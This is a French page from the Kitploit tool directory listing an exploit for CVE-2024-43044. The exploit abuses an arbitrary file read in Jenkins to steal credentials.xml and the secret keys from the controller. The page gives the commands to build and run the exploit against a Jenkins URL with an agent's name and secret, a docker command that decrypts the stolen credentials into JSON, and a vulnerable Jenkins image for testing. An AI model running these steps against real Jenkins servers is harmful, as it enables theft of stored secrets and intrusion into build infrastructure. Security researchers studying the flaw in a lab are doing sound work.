Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-43044-jenkins-creds — Exploit pour CVE-2024-43044 permettant une lecture arbitraire de fichiers depuis le contrôleur Jenkins afin d'extraire et de déchiffrer credentials.xml à l'aide de clés secrètes. | Kitploit
Outils/GitHubGitHub/dacc4/cve-2024-43044-jenkins-creds
Outils de Chiffrement/DéchiffrementAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubdacc4/cve-2024-43044-jenkins-creds

CVE-2024-43044-jenkins-creds

Exploit pour CVE-2024-43044 permettant une lecture arbitraire de fichiers depuis le contrôleur Jenkins afin d'extraire et de déchiffrer credentials.xml à l'aide de clés secrètes.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
4il y a 1 anPas encore vérifié

Introduction

Ceci est un exploit pour CVE-2024-43044, une lecture de fichier arbitraire qui permet à un agent de récupérer des fichiers depuis le contrôleur.

L'exploit utilise la vulnérabilité pour lire le fichier credentials.xml et obtenir les clés secrètes nécessaires à son déchiffrement.

Code initial : https://github.com/convisolabs/CVE-2024-43044-jenkins Analyse originale : https://blog.convisoappsec.com/en/analysis-of-cve-2024-43044/

Compilation de l'exploit

root@kitploit:~
mvn package

Exécution de l'exploit

root@kitploit:~
java -jar exploit.jar mode_secret <jenkinsUrl> <nodeName> <nodeSecretKey>

Déchiffrer credentials.xml

root@kitploit:~
docker run \
  --rm \
  --network none \
  --workdir / \
  --mount "type=bind,src=$PWD/master.key,dst=/master.key" \
  --mount "type=bind,src=$PWD/hudson.util.Secret,dst=/hudson.util.Secret" \
  --mount "type=bind,src=$PWD/credentials.xml,dst=/credentials.xml" \
  docker.io/hoto/jenkins-credentials-decryptor:latest \
  /jenkins-credentials-decryptor \
    -m master.key \
    -s hudson.util.Secret \
    -c credentials.xml \
    -o json

Test

Vous pouvez le tester sur une version vulnérable en utilisant docker :

root@kitploit:~
docker run -p 8080:8080 -p 50000:50000 --restart=on-failure jenkins/jenkins:2.441-jdk17

Une fois que vous avez un Jenkins en cours d'exécution, configurez un agent.

Télécharger l’outil